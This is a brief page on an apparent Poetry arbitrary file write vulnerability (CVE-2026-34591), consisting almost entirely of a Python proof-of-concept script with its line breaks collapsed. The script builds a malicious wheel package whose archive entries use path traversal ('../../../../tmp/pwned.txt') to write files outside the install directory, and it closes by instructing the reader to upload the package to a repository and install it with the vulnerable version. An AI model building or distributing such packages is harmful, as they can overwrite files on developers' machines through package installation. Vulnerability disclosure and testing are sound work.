CVE-2026-34591 Poetry任意文件写入漏洞

import os import zipfile # Create a malicious wheel file (simplified) malicious_wheel_name = 'malicious_package-1.0.0-py3-none-any.whl' with zipfile.ZipFile(malicious_wheel_name, 'w') as zf: # Add a file with a path traversal sequence # This will attempt to write to /tmp/pwned.txt or C:\Temp\pwned.txt data = b'This file was written by a vulnerable Poetry installation.' # Unix-like path traversal zf.writestr('../../../../tmp/pwned.txt', data) # Windows path traversal (optional, depending on target) # zf.writestr('../../../../Windows/Temp/pwned.txt', data) # Metadata to make it look somewhat valid (minimal) metadata = '''Metadata-Version: 2.1 Name: malicious-package Version: 1.0.0 ''' zf.writestr('malicious_package-1.0.0.dist-info/METADATA', metadata) record = '''../../../../tmp/pwned.txt,, malicious_package-1.0.0.dist-info/METADATA,, ''' zf.writestr('malicious_package-1.0.0.dist-info/RECORD', record) print(f'Created {malicious_wheel_name}') print('Upload this to a repository and install it with the vulnerable Poetry version.')